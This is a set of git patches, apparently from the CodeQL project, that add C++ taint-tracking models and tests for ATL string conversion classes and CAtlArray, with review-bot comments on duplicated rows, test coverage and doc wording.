@@ -84,3 +84,85 @@ void test__U_STRINGorID() { sink(u.m_lpstr); // $ ir } } + +template +struct CA2AEX { + LPSTR m_psz; + char m_szBuffer[t_nBufferLength]; + + CA2AEX(LPCSTR psz, UINT nCodePage); + CA2AEX(LPCSTR psz); + + ~CA2AEX(); + + operator LPSTR() const throw(); +}; + +void test_CA2AEX() { + { + LPSTR x = indirect_source(); + CA2AEX<128> a(x); + sink(static_cast(a)); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + sink(a.m_szBuffer); // $ MISSING: ir + } + + { + LPSTR x = indirect_source(); + CA2AEX<128> a(x, 0); + sink(static_cast(a)); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + sink(a.m_szBuffer); // $ MISSING: ir + } +} + +template +struct CA2CAEX { + CA2CAEX(LPCSTR psz, UINT nCodePage) ; + CA2CAEX(LPCSTR psz) ; + ~CA2CAEX() throw(); + operator LPCSTR() const throw(); + LPCSTR m_psz; +}; + +void test_CA2CAEX() { + LPCSTR x = indirect_source(); + { + CA2CAEX<128> a(x); + sink(static_cast(a)); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + } + { + CA2CAEX<128> a(x, 0); + sink(static_cast(a)); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + } +} + +template +struct CA2WEX { + CA2WEX(LPCSTR psz, UINT nCodePage) ; + CA2WEX(LPCSTR psz) ; + ~CA2WEX() throw(); + operator LPWSTR() const throw(); + LPWSTR m_psz; + wchar_t m_szBuffer[t_nBufferLength]; +}; + +void test_CA2WEX() { + LPCSTR x = indirect_source(); + { + CA2WEX<128> a(x); + sink(static_cast(a)); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + } + { + CA2WEX<128> a(x, 0); + sink(static_cast(a)); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + sink(a.m_psz); // $ MISSING: ir + } +} From 763b991408c56341c4643dd117c0c7682dd2abd6 Mon Sep 17 00:00:00 2001 
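Review bot: In `test_CA2WEX` both blocks call `sink(a.m_psz)` twice and never read `a.m_szBuffer`, although `CA2WEX` declares `wchar_t m_szBuffer[t_nBufferLength]` and `test_CA2AEX` checks both fields. The buffer field of the wide variant therefore has no expectation at all, so a missing or wrong model for it would go unnoticed. The second call in each block should be `sink(a.m_szBuffer); // $ MISSING: ir`. In `test_CA2CAEX` the repeated `sink(a.m_psz)` is only redundant, since that struct has no buffer member, and one of the two lines can be dropped.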
From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 17:56:32 +0000 Subject: [PATCH 0720/1267] C++: Add models. --- cpp/ql/lib/ext/CA2CAEX.model.yml | 11 +++++++++++ cpp/ql/lib/semmle/code/cpp/models/Models.qll | 1 + .../code/cpp/models/implementations/CA2AEX.qll | 17 +++++++++++++++++ 3 files changed, 29 insertions(+) create mode 100644 cpp/ql/lib/semmle/code/cpp/models/implementations/CA2AEX.qll diff --git a/cpp/ql/lib/ext/CA2CAEX.model.yml b/cpp/ql/lib/ext/CA2CAEX.model.yml index f199d1fddea..ee1d53a537c 100644 --- a/cpp/ql/lib/ext/CA2CAEX.model.yml +++ b/cpp/ql/lib/ext/CA2CAEX.model.yml 
@@ -5,3 +5,14 @@ extensions: data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - ["", "_U_STRINGorID", True, "_U_STRINGorID", "(UINT)", "", "Argument[0]", "Argument[-1].Field[*m_lpstr]", "value", "manual"] - ["", "_U_STRINGorID", True, "_U_STRINGorID", "(LPCTSTR)", "", "Argument[*0]", "Argument[-1].Field[*m_lpstr]", "value", "manual"] + - ["", "CA2AEX", True, "CA2AEX", "", "", "Argument[*0]", "Argument[-1].Field[*m_psz]", "value", "manual"] + - ["", "CA2AEX", True, "CA2AEX", "", "", "Argument[*0]", "Argument[-1].Field[m_szBuffer]", "value", "manual"] + - ["", "CA2AEX", True, "operator LPSTR", "", "", "Argument[-1].Field[*m_psz]", "ReturnValue[*]", "value", "manual"] + - ["", "CA2AEX", True, "CA2AEX", "", "", "Argument[*0]", "Argument[-1].Field[m_szBuffer]", "value", "manual"] + - ["", "CA2AEX", True, "operator LPSTR", "", "", "Argument[-1].Field[m_szBuffer]", "ReturnValue[*]", "value", "manual"] + - ["", "CA2CAEX", True, "CA2CAEX", "", "", "Argument[*0]", "Argument[-1].Field[*m_psz]", "value", "manual"] + - ["", "CA2CAEX", True, "operator LPCSTR", "", "", "Argument[-1].Field[*m_psz]", "ReturnValue[*]", "value", "manual"] + - ["", "CA2WEX", True, "CA2WEX", "", "", "Argument[*0]", "Argument[-1].Field[*m_psz]", "value", "manual"] + - ["", "CA2WEX", True, "operator LPWSTR", "", "", "Argument[-1].Field[*m_psz]", "ReturnValue[*]", "value", "manual"] + - ["", "CA2WEX", True, "CA2WEX", "", "", "Argument[*0]", "Argument[-1].Field[m_szBuffer]", "value", "manual"] + - ["", "CA2WEX", True, "operator LPWSTR", "", "", "Argument[-1].Field[m_szBuffer]", "ReturnValue[*]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/lib/semmle/code/cpp/models/Models.qll b/cpp/ql/lib/semmle/code/cpp/models/Models.qll index f6776a623ff..bb63416eaef 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/Models.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/Models.qll 
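Review bot: The row `["", "CA2AEX", True, "CA2AEX", "", "", "Argument[*0]", "Argument[-1].Field[m_szBuffer]", "value", "manual"]` is added twice, as the second and fourth new lines of this hunk; one of them should be removed. The empty signature column also means each constructor row applies to every overload of that constructor, which fits the two overloads in the test stub but is worth stating in a `#` comment above the block so a later overload with a different first argument is not modelled by accident. The file now ends without a trailing newline.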
@@ -50,3 +50,4 @@ private import implementations.System private import implementations.StructuredExceptionHandling private import implementations.ZMQ private import implementations.Win32CommandExecution +private import implementations.CA2AEX diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CA2AEX.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CA2AEX.qll new file mode 100644 index 00000000000..595b6e3bb3e --- /dev/null +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CA2AEX.qll @@ -0,0 +1,17 @@ +private import cpp +private import semmle.code.cpp.ir.dataflow.FlowSteps +private import semmle.code.cpp.dataflow.new.DataFlow + +/** + * The `CA2AEX` (and related) classes from the Windows Active Template library. + */ +class Ca2Aex extends Class { + Ca2Aex() { this.hasGlobalName(["CA2AEX", "CA2CAEX", "CA2WEX"]) } +} + +private class Ca2AexTaintInheritingContent extends TaintInheritingContent, DataFlow::FieldContent { + Ca2AexTaintInheritingContent() { + // The two members m_psz and m_szBuffer + this.getField().getDeclaringType() instanceof Ca2Aex + } +} From 2c7d0dec7d4384a47a49448e1387c7bdd0e9abf0 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 18:01:33 +0000 Subject: [PATCH 0721/1267] C++: Accept test changes. --- .../dataflow/taint-tests/atl.cpp | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index d05a2f22a01..5f0f12b31f8 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp 
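Review bot: `Ca2AexTaintInheritingContent` in the new `CA2AEX.qll` treats every field declared in `CA2AEX`, `CA2CAEX` or `CA2WEX` as taint-inheriting, while its comment says it is about the two members `m_psz` and `m_szBuffer`; nothing in the characteristic predicate restricts the field name. If only those two are meant, add `this.getField().hasName(["m_psz", "m_szBuffer"]) and` before the declaring-type check, otherwise reword the comment to say that all fields are covered. The class also has no QLDoc explaining why a read of the whole object should pick up taint from these fields, which is the part a reader of the taint library needs.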
@@ -103,16 +103,16 @@ void test_CA2AEX() { LPSTR x = indirect_source(); CA2AEX<128> a(x); sink(static_cast(a)); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir - sink(a.m_szBuffer); // $ MISSING: ir + sink(a.m_psz); // $ ir + sink(a.m_szBuffer); // $ ir } { LPSTR x = indirect_source(); CA2AEX<128> a(x, 0); sink(static_cast(a)); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir - sink(a.m_szBuffer); // $ MISSING: ir + sink(a.m_psz); // $ ir + sink(a.m_szBuffer); // $ ir } } @@ -130,14 +130,14 @@ void test_CA2CAEX() { { CA2CAEX<128> a(x); sink(static_cast(a)); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir + sink(a.m_psz); // $ ir + sink(a.m_psz); // $ ir } { CA2CAEX<128> a(x, 0); sink(static_cast(a)); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir + sink(a.m_psz); // $ ir + sink(a.m_psz); // $ ir } } @@ -156,13 +156,13 @@ void test_CA2WEX() { { CA2WEX<128> a(x); sink(static_cast(a)); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir + sink(a.m_psz); // $ ir + sink(a.m_psz); // $ ir } { CA2WEX<128> a(x, 0); sink(static_cast(a)); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir - sink(a.m_psz); // $ MISSING: ir + sink(a.m_psz); // $ ir + sink(a.m_psz); // $ ir } } From c00f84d74a0f209b4e25c2d080e0758845914940 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 18:03:30 +0000 Subject: [PATCH 0722/1267] C++: Work around the 'wrong' function name for conversion operators. --- .../semmle/code/cpp/dataflow/ExternalFlow.qll | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll b/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll index ec25b08856c..ac10651b551 100644 --- a/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll +++ b/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll 
@@ -754,6 +754,22 @@ private predicate elementSpecMatchesSignature( signatureMatches(func, signature, type, name, 0) } +/** + * Holds when `method` has name `nameWithoutArgs`, and gets the enclosing + * class of `method`. Unlike `method.getClassAndName` this predicate does + * not strip typedefs from the name when `method` is an `ConversionOperator`. + */ +bindingset[nameWithoutArgs] +pragma[inline_late] +private Class getClassAndNameImpl(Function method, string nameWithoutArgs) { + exists(string memberName | result = method.getClassAndName(memberName) | + nameWithoutArgs = "operator " + method.(ConversionOperator).getDestType() + or + not method instanceof ConversionOperator and + memberName = nameWithoutArgs + ) +} + /** * Holds if `classWithMethod` has `method` named `name` (excluding any * template parameters). @@ -763,7 +779,7 @@ pragma[inline_late] private predicate hasClassAndName(Class classWithMethod, Function method, string name) { exists(string nameWithoutArgs | parseAngles(name, nameWithoutArgs, _, "") and - classWithMethod = method.getClassAndName(nameWithoutArgs) + classWithMethod = getClassAndNameImpl(method, nameWithoutArgs) ) } From 4f2cd81f9e7956999ba2407adad3c9ef9fd64ce3 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 18:04:59 +0000 Subject: [PATCH 0723/1267] C++: Accept test changes. --- .../test/library-tests/dataflow/taint-tests/atl.cpp | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 5f0f12b31f8..7396d4fce9a 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -102,7 +102,7 @@ void test_CA2AEX() { { LPSTR x = indirect_source(); CA2AEX<128> a(x); - sink(static_cast(a)); // $ MISSING: ir + sink(static_cast(a)); // $ ir sink(a.m_psz); // $ ir sink(a.m_szBuffer); // $ ir } 
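Review bot: In `getClassAndNameImpl` the conversion-operator branch compares `nameWithoutArgs` with `"operator " + method.(ConversionOperator).getDestType()`, so a model row only binds when its name column spells the destination type exactly as that type prints. The QLDoc should say so, for example by adding the line `* For a conversion operator the name is "operator " followed by the destination type as written, e.g. "operator LPSTR".` As far as this hunk shows, a row that uses a different spelling of the same type matches nothing, and a silent miss in a summary model means lost taint flow rather than an error. The comment also reads "an `ConversionOperator`", which should be "a `ConversionOperator`".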
@@ -110,7 +110,7 @@ void test_CA2AEX() { { LPSTR x = indirect_source(); CA2AEX<128> a(x, 0); - sink(static_cast(a)); // $ MISSING: ir + sink(static_cast(a)); // $ ir sink(a.m_psz); // $ ir sink(a.m_szBuffer); // $ ir } @@ -129,13 +129,13 @@ void test_CA2CAEX() { LPCSTR x = indirect_source(); { CA2CAEX<128> a(x); - sink(static_cast(a)); // $ MISSING: ir + sink(static_cast(a)); // $ ir sink(a.m_psz); // $ ir sink(a.m_psz); // $ ir } { CA2CAEX<128> a(x, 0); - sink(static_cast(a)); // $ MISSING: ir + sink(static_cast(a)); // $ ir sink(a.m_psz); // $ ir sink(a.m_psz); // $ ir } @@ -155,13 +155,13 @@ void test_CA2WEX() { LPCSTR x = indirect_source(); { CA2WEX<128> a(x); - sink(static_cast(a)); // $ MISSING: ir + sink(static_cast(a)); // $ ir sink(a.m_psz); // $ ir sink(a.m_psz); // $ ir } { CA2WEX<128> a(x, 0); - sink(static_cast(a)); // $ MISSING: ir + sink(static_cast(a)); // $ ir sink(a.m_psz); // $ ir sink(a.m_psz); // $ ir } From 1cd426e9f96af085c4e33e66a1dbe49eb33c6fae Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 11:31:53 +0000 Subject: [PATCH 0724/1267] C++: Add failing tests with 'CAtlArray'. --- .../dataflow/taint-tests/atl.cpp | 83 ++++++++++ .../dataflow/taint-tests/localTaint.expected | 145 ++++++++++++++++++ 2 files changed, 228 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 7396d4fce9a..c26966c908e 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp 
@@ -166,3 +166,86 @@ void test_CA2WEX() { sink(a.m_psz); // $ ir } } + +template +struct CElementTraitsBase { + typedef const T& INARGTYPE; + typedef T& OUTARGTYPE; + + static void CopyElements(T* pDest, const T* pSrc, size_t nElements); + static void RelocateElements(T* pDest, T* pSrc, size_t nElements); +}; + +template +struct CDefaultElementTraits : public CElementTraitsBase {}; + +template +struct CElementTraits : public CDefaultElementTraits {}; + +template> +struct CAtlArray { + using INARGTYPE = typename ETraits::INARGTYPE; + using OUTARGTYPE = typename ETraits::OUTARGTYPE; + + CAtlArray() throw(); + ~CAtlArray() throw(); + + size_t Add(INARGTYPE element); + size_t Add(); + size_t Append(const CAtlArray& aSrc); + void Copy(const CAtlArray& aSrc); + const E& GetAt(size_t iElement) const throw(); + E& GetAt(size_t iElement) throw(); + size_t GetCount() const throw(); + E* GetData() throw(); + const E* GetData() const throw(); + void InsertArrayAt(size_t iStart, const CAtlArray* paNew); + void InsertAt(size_t iElement, INARGTYPE element, size_t nCount); + bool IsEmpty() const throw(); + void RemoveAll() throw(); + void RemoveAt(size_t iElement, size_t nCount); + void SetAt(size_t iElement, INARGTYPE element); + void SetAtGrow(size_t iElement, INARGTYPE element); + bool SetCount(size_t nNewSize, int nGrowBy); + E& operator[](size_t ielement) throw(); + const E& operator[](size_t ielement) const throw(); +}; + +void test_CAtlArray() { + int x = source(); + + { + CAtlArray a; + a.Add(x); + sink(a[0]); // $ MISSING: ir + a.Add(0); + sink(a[0]); // $ MISSING: ir + + CAtlArray a2; + sink(a2[0]); + a2.Append(a); + sink(a2[0]); // $ MISSING: ir + + CAtlArray a3; + sink(a3[0]); + a3.Copy(a2); + sink(a3[0]); // $ MISSING: ir + + sink(a3.GetAt(0)); // $ MISSING: ir + sink(*a3.GetData()); // $ MISSING: ir + + CAtlArray a4; + sink(a4.GetAt(0)); + a4.InsertArrayAt(0, &a3); + sink(a4.GetAt(0)); // $ MISSING: ir + } + { + CAtlArray a5; + a5.InsertAt(0, source(), 1); + 
sink(a5[0]); // $ MISSING: ir + + CAtlArray a6; + a6.SetAtGrow(0, source()); + sink(a6[0]); // $ MISSING: ir + } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index 7809703f9c8..cd0b25deb45 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected 
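Review bot: `test_CAtlArray` never calls `SetAt`, although the stub declares it with the same `(size_t, INARGTYPE)` shape as `SetAtGrow`, and it is the most direct way to store a tainted element. The test does cover `Add`, `Append`, `Copy`, `GetAt`, `GetData`, `InsertArrayAt`, `InsertAt` and `SetAtGrow`. A block mirroring the `SetAtGrow` one, with `a7.SetAt(0, source());` followed by `sink(a7[0]); // $ MISSING: ir`, would make a missing model row for `SetAt` visible in the expectations.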
@@ -147,6 +147,151 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:82:17:82:43 | call to indirect_source | atl.cpp:83:21:83:21 | y | | | atl.cpp:83:21:83:21 | y | atl.cpp:83:21:83:22 | call to _U_STRINGorID | TAINT | | atl.cpp:83:21:83:22 | call to _U_STRINGorID | atl.cpp:84:10:84:10 | u | | +| atl.cpp:103:15:103:35 | call to indirect_source | atl.cpp:104:19:104:19 | x | | +| atl.cpp:104:19:104:19 | x | atl.cpp:104:19:104:20 | call to CA2AEX | TAINT | +| atl.cpp:104:19:104:20 | call to CA2AEX | atl.cpp:105:29:105:29 | a | | +| atl.cpp:104:19:104:20 | call to CA2AEX | atl.cpp:106:10:106:10 | a | | +| atl.cpp:104:19:104:20 | call to CA2AEX | atl.cpp:107:10:107:10 | a | | +| atl.cpp:104:19:104:20 | call to CA2AEX | atl.cpp:108:3:108:3 | a | | +| atl.cpp:105:29:105:29 | ref arg a | atl.cpp:106:10:106:10 | a | | +| atl.cpp:105:29:105:29 | ref arg a | atl.cpp:107:10:107:10 | a | | +| atl.cpp:105:29:105:29 | ref arg a | atl.cpp:108:3:108:3 | a | | +| atl.cpp:106:10:106:10 | a [post update] | atl.cpp:107:10:107:10 | a | | +| atl.cpp:106:10:106:10 | a [post update] | atl.cpp:108:3:108:3 | a | | +| atl.cpp:107:10:107:10 | a [post update] | atl.cpp:108:3:108:3 | a | | +| atl.cpp:111:15:111:35 | call to indirect_source | atl.cpp:112:19:112:19 | x | | +| atl.cpp:112:19:112:23 | call to CA2AEX | atl.cpp:113:29:113:29 | a | | +| atl.cpp:112:19:112:23 | call to CA2AEX | atl.cpp:114:10:114:10 | a | | +| atl.cpp:112:19:112:23 | call to CA2AEX | atl.cpp:115:10:115:10 | a | | +| atl.cpp:112:19:112:23 | call to CA2AEX | atl.cpp:116:3:116:3 | a | | +| atl.cpp:113:29:113:29 | ref arg a | atl.cpp:114:10:114:10 | a | | +| atl.cpp:113:29:113:29 | ref arg a | atl.cpp:115:10:115:10 | a | | +| atl.cpp:113:29:113:29 | ref arg a | atl.cpp:116:3:116:3 | a | | +| atl.cpp:114:10:114:10 | a [post update] | atl.cpp:115:10:115:10 | a | | +| atl.cpp:114:10:114:10 | a [post update] | atl.cpp:116:3:116:3 | a | | +| atl.cpp:115:10:115:10 | a [post update] | 
atl.cpp:116:3:116:3 | a | | +| atl.cpp:129:14:129:34 | call to indirect_source | atl.cpp:131:20:131:20 | x | | +| atl.cpp:129:14:129:34 | call to indirect_source | atl.cpp:137:20:137:20 | x | | +| atl.cpp:131:20:131:20 | x | atl.cpp:131:20:131:21 | call to CA2CAEX | TAINT | +| atl.cpp:131:20:131:21 | call to CA2CAEX | atl.cpp:132:30:132:30 | a | | +| atl.cpp:131:20:131:21 | call to CA2CAEX | atl.cpp:133:10:133:10 | a | | +| atl.cpp:131:20:131:21 | call to CA2CAEX | atl.cpp:134:10:134:10 | a | | +| atl.cpp:131:20:131:21 | call to CA2CAEX | atl.cpp:135:3:135:3 | a | | +| atl.cpp:137:20:137:24 | call to CA2CAEX | atl.cpp:138:30:138:30 | a | | +| atl.cpp:137:20:137:24 | call to CA2CAEX | atl.cpp:139:10:139:10 | a | | +| atl.cpp:137:20:137:24 | call to CA2CAEX | atl.cpp:140:10:140:10 | a | | +| atl.cpp:137:20:137:24 | call to CA2CAEX | atl.cpp:141:3:141:3 | a | | +| atl.cpp:155:14:155:34 | call to indirect_source | atl.cpp:157:19:157:19 | x | | +| atl.cpp:155:14:155:34 | call to indirect_source | atl.cpp:163:19:163:19 | x | | +| atl.cpp:157:19:157:19 | x | atl.cpp:157:19:157:20 | call to CA2WEX | TAINT | +| atl.cpp:157:19:157:20 | call to CA2WEX | atl.cpp:158:30:158:30 | a | | +| atl.cpp:157:19:157:20 | call to CA2WEX | atl.cpp:159:10:159:10 | a | | +| atl.cpp:157:19:157:20 | call to CA2WEX | atl.cpp:160:10:160:10 | a | | +| atl.cpp:157:19:157:20 | call to CA2WEX | atl.cpp:161:3:161:3 | a | | +| atl.cpp:158:30:158:30 | ref arg a | atl.cpp:159:10:159:10 | a | | +| atl.cpp:158:30:158:30 | ref arg a | atl.cpp:160:10:160:10 | a | | +| atl.cpp:158:30:158:30 | ref arg a | atl.cpp:161:3:161:3 | a | | +| atl.cpp:159:10:159:10 | a [post update] | atl.cpp:160:10:160:10 | a | | +| atl.cpp:159:10:159:10 | a [post update] | atl.cpp:161:3:161:3 | a | | +| atl.cpp:159:12:159:16 | ref arg m_psz | atl.cpp:160:12:160:16 | m_psz | | +| atl.cpp:160:10:160:10 | a [post update] | atl.cpp:161:3:161:3 | a | | +| atl.cpp:163:19:163:23 | call to CA2WEX | atl.cpp:164:30:164:30 | a | | +| 
atl.cpp:163:19:163:23 | call to CA2WEX | atl.cpp:165:10:165:10 | a | | +| atl.cpp:163:19:163:23 | call to CA2WEX | atl.cpp:166:10:166:10 | a | | +| atl.cpp:163:19:163:23 | call to CA2WEX | atl.cpp:167:3:167:3 | a | | +| atl.cpp:164:30:164:30 | ref arg a | atl.cpp:165:10:165:10 | a | | +| atl.cpp:164:30:164:30 | ref arg a | atl.cpp:166:10:166:10 | a | | +| atl.cpp:164:30:164:30 | ref arg a | atl.cpp:167:3:167:3 | a | | +| atl.cpp:165:10:165:10 | a [post update] | atl.cpp:166:10:166:10 | a | | +| atl.cpp:165:10:165:10 | a [post update] | atl.cpp:167:3:167:3 | a | | +| atl.cpp:165:12:165:16 | ref arg m_psz | atl.cpp:166:12:166:16 | m_psz | | +| atl.cpp:166:10:166:10 | a [post update] | atl.cpp:167:3:167:3 | a | | +| atl.cpp:215:11:215:21 | call to source | atl.cpp:219:11:219:11 | x | | +| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:219:5:219:5 | a | | +| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:220:10:220:10 | a | | +| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:221:5:221:5 | a | | +| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:222:10:222:10 | a | | +| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:226:15:226:15 | a | | +| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:241:3:241:3 | a | | +| atl.cpp:219:5:219:5 | ref arg a | atl.cpp:220:10:220:10 | a | | +| atl.cpp:219:5:219:5 | ref arg a | atl.cpp:221:5:221:5 | a | | +| atl.cpp:219:5:219:5 | ref arg a | atl.cpp:222:10:222:10 | a | | +| atl.cpp:219:5:219:5 | ref arg a | atl.cpp:226:15:226:15 | a | | +| atl.cpp:219:5:219:5 | ref arg a | atl.cpp:241:3:241:3 | a | | +| atl.cpp:220:10:220:10 | ref arg a | atl.cpp:221:5:221:5 | a | | +| atl.cpp:220:10:220:10 | ref arg a | atl.cpp:222:10:222:10 | a | | +| atl.cpp:220:10:220:10 | ref arg a | atl.cpp:226:15:226:15 | a | | +| atl.cpp:220:10:220:10 | ref arg a | atl.cpp:241:3:241:3 | a | | +| atl.cpp:221:5:221:5 | ref arg a | atl.cpp:222:10:222:10 | a | | +| atl.cpp:221:5:221:5 | ref arg a | atl.cpp:226:15:226:15 | a | | +| 
atl.cpp:221:5:221:5 | ref arg a | atl.cpp:241:3:241:3 | a | | +| atl.cpp:222:10:222:10 | ref arg a | atl.cpp:226:15:226:15 | a | | +| atl.cpp:222:10:222:10 | ref arg a | atl.cpp:241:3:241:3 | a | | +| atl.cpp:224:20:224:21 | call to CAtlArray | atl.cpp:225:10:225:11 | a2 | | +| atl.cpp:224:20:224:21 | call to CAtlArray | atl.cpp:226:5:226:6 | a2 | | +| atl.cpp:224:20:224:21 | call to CAtlArray | atl.cpp:227:10:227:11 | a2 | | +| atl.cpp:224:20:224:21 | call to CAtlArray | atl.cpp:231:13:231:14 | a2 | | +| atl.cpp:224:20:224:21 | call to CAtlArray | atl.cpp:241:3:241:3 | a2 | | +| atl.cpp:225:10:225:11 | ref arg a2 | atl.cpp:226:5:226:6 | a2 | | +| atl.cpp:225:10:225:11 | ref arg a2 | atl.cpp:227:10:227:11 | a2 | | +| atl.cpp:225:10:225:11 | ref arg a2 | atl.cpp:231:13:231:14 | a2 | | +| atl.cpp:225:10:225:11 | ref arg a2 | atl.cpp:241:3:241:3 | a2 | | +| atl.cpp:226:5:226:6 | ref arg a2 | atl.cpp:227:10:227:11 | a2 | | +| atl.cpp:226:5:226:6 | ref arg a2 | atl.cpp:231:13:231:14 | a2 | | +| atl.cpp:226:5:226:6 | ref arg a2 | atl.cpp:241:3:241:3 | a2 | | +| atl.cpp:227:10:227:11 | ref arg a2 | atl.cpp:231:13:231:14 | a2 | | +| atl.cpp:227:10:227:11 | ref arg a2 | atl.cpp:241:3:241:3 | a2 | | +| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:230:10:230:11 | a3 | | +| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:231:5:231:6 | a3 | | +| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:232:10:232:11 | a3 | | +| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:234:10:234:11 | a3 | | +| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:235:11:235:12 | a3 | | +| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:239:26:239:27 | a3 | | +| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:241:3:241:3 | a3 | | +| atl.cpp:230:10:230:11 | ref arg a3 | atl.cpp:231:5:231:6 | a3 | | +| atl.cpp:230:10:230:11 | ref arg a3 | atl.cpp:232:10:232:11 | a3 | | +| atl.cpp:230:10:230:11 | ref arg a3 | atl.cpp:234:10:234:11 | a3 | | +| atl.cpp:230:10:230:11 | ref arg a3 
| atl.cpp:235:11:235:12 | a3 | | +| atl.cpp:230:10:230:11 | ref arg a3 | atl.cpp:239:26:239:27 | a3 | | +| atl.cpp:230:10:230:11 | ref arg a3 | atl.cpp:241:3:241:3 | a3 | | +| atl.cpp:231:5:231:6 | ref arg a3 | atl.cpp:232:10:232:11 | a3 | | +| atl.cpp:231:5:231:6 | ref arg a3 | atl.cpp:234:10:234:11 | a3 | | +| atl.cpp:231:5:231:6 | ref arg a3 | atl.cpp:235:11:235:12 | a3 | | +| atl.cpp:231:5:231:6 | ref arg a3 | atl.cpp:239:26:239:27 | a3 | | +| atl.cpp:231:5:231:6 | ref arg a3 | atl.cpp:241:3:241:3 | a3 | | +| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:234:10:234:11 | a3 | | +| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:235:11:235:12 | a3 | | +| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:239:26:239:27 | a3 | | +| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:241:3:241:3 | a3 | | +| atl.cpp:234:10:234:11 | ref arg a3 | atl.cpp:235:11:235:12 | a3 | | +| atl.cpp:234:10:234:11 | ref arg a3 | atl.cpp:239:26:239:27 | a3 | | +| atl.cpp:234:10:234:11 | ref arg a3 | atl.cpp:241:3:241:3 | a3 | | +| atl.cpp:235:11:235:12 | ref arg a3 | atl.cpp:239:26:239:27 | a3 | | +| atl.cpp:235:11:235:12 | ref arg a3 | atl.cpp:241:3:241:3 | a3 | | +| atl.cpp:235:14:235:20 | call to GetData | atl.cpp:235:10:235:22 | * ... | TAINT | +| atl.cpp:237:20:237:21 | call to CAtlArray | atl.cpp:238:10:238:11 | a4 | | +| atl.cpp:237:20:237:21 | call to CAtlArray | atl.cpp:239:5:239:6 | a4 | | +| atl.cpp:237:20:237:21 | call to CAtlArray | atl.cpp:240:10:240:11 | a4 | | +| atl.cpp:237:20:237:21 | call to CAtlArray | atl.cpp:241:3:241:3 | a4 | | +| atl.cpp:238:10:238:11 | ref arg a4 | atl.cpp:239:5:239:6 | a4 | | +| atl.cpp:238:10:238:11 | ref arg a4 | atl.cpp:240:10:240:11 | a4 | | +| atl.cpp:238:10:238:11 | ref arg a4 | atl.cpp:241:3:241:3 | a4 | | +| atl.cpp:239:5:239:6 | ref arg a4 | atl.cpp:240:10:240:11 | a4 | | +| atl.cpp:239:5:239:6 | ref arg a4 | atl.cpp:241:3:241:3 | a4 | | 